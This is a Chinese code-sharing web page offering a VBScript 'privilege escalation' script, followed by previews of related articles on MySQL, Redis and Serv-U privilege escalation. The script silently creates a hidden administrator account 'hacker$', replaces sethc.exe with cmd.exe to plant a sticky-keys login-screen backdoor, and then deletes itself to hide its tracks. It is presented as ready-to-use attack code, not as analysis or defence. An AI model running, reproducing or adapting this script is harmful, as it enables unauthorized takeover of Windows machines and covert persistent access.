提权vbs代码

代码如下:

on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments
(0):password=Wscript.Arguments(1):Else:username="hacker$":password="123456":end if:set
wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject
(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword
password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo
of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%
\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32
\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%
\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

(0)

相关推荐

  • 提权vbs代码

    复制代码 代码如下: on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments (0):password=Wscript.Arguments(1):Else:username="hacker$":password="123456":end if:set wsnetwork=CreateObject("WSCRIP

  • python禁用键鼠与提权代码实例

    要求 利用python实现禁用键盘鼠标 思路 经过查阅资料目前最好的办法是采用ctypes中的dll文件进行编写 from ctypes import * improt time print(winll.shell32.IsUserAnAdmin()) #判断是否有管理员权限 user32 = windll.LoadLibrary("C:\\Windows\\System32\\user32.dll") user32.BlockInput(True) #该功能需要管理员权限 True

  • Mysql提权的多种姿势汇总

    目录 一.写入Webshell into outfile 写shell 日志文件写shell 二.UDF提权 三.MOF提权 总结 一.写入Webshell into outfile 写shell 前提条件: 1.知道网站物理路径 2.高权限数据库用户 3.load_file() 开启 即 secure_file_priv 无限制 4.网站路径有写入权限 首先基础语法查询是否 secure_file_priv 没有限制 show global variables like '%secure_fi

  • 防止aspxspy木马列服务 iis信息 执行命令提权等操作

    环境:windows2003+iis6+.net2.0 处于安全考虑,对服务器安全进行设置.上传aspxspy测试. ASPXSPY探针 1.禁止aspxspy木马执行命令提权 和读取注册表 测试方法一: 先打开:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\config\web.config 之后找到 <trust level="Full" originUrl="" /> 改为 <trust leve

  • Linux下非交互式提权详解

    前言 之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell.而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功.因此,写了一个简单的工具.需要的朋友们可以参考学习. 方法如下 proce_open() // path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18 // cmd是你需要执行的命令,例如:whoami if(isset($_GET['path']) && iss

  • Java实现平滑加权轮询算法之降权和提权详解

    目录 前言 1.两个关键点 2.代码实现 2.1.服务节点类 2.2.平滑轮询算法降权和提权 3.分析结果 4.结论 前言 上一篇讲了普通轮询.加权轮询的两种实现方式,重点讲了平滑加权轮询算法,并在文末留下了悬念:节点出现分配失败时降低有效权重值:成功时提高有效权重值(但不能大于weight值). 本文在平滑加权轮询算法的基础上讲,还没弄懂的可以看上一篇文章. 现在来模拟实现:平滑加权轮询算法的降权和提权 1.两个关键点 节点宕机时,降低有效权重值: 节点正常时,提高有效权重值(但不能大于wei

  • 修改ini文件的批处理与vbs代码

    批处理代码: @echo off >tmp.ini for /f "tokens=1* delims=:" %%i in ('findstr /n ".*" 文件位置') do ( if "%%j"=="" (echo.>>tmp.ini) else ( echo %%j|find "被替换内容">nul&&( call set tp=%%j&call ech

  • python脚本实现Redis未授权批量提权

    前言 本文主要给大家介绍了关于redis未授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧. 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT] For Example: -----------------------------------

  • 支持断点下载的VBS代码

    之前我就介绍过VBScript语言的强大.今天再给出一个支持断点下载的VBS代码. 并附上VBS代码的解析,不懂的朋友可以配合微软的SCRIPT56.CHM文档自学.很简单, VBS的好处就是代码易于理解.基本上每行代码执行功能都用英文表示出来了. 这个代码也是对我以前介绍的VBS下载功能的补充. 老规矩,复制保存为dl.vbe. 不过这个VBS的代码的不同之处不是双击运行,而是在CMD命令行下执行. 下载功能执行的格式是: cscript.exe dl.vbs (目标文件地址) [以下载Met

  • Serv-U防溢出提权攻击解决设置方法

    前言: 大家应该都还没有忘记三年前在Serv-U5.004版的之前所有版本的"Serv-U FTPMDTM命令缓冲区溢出"与"Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞"吧,这个漏洞让很多服务器管理员立坐不安,也让很多大型的站点.甚至电信级的服务器沦陷了...随着Serv-U新版本的推出,这个漏同已经不存在了:虽然溢出不存在了,但黑客永远也没有停止,所以伴随着来的又是Serv-U5.0到6.0之黑客常用的本地提升权限缺陷.(注:最常见的就如

随机推荐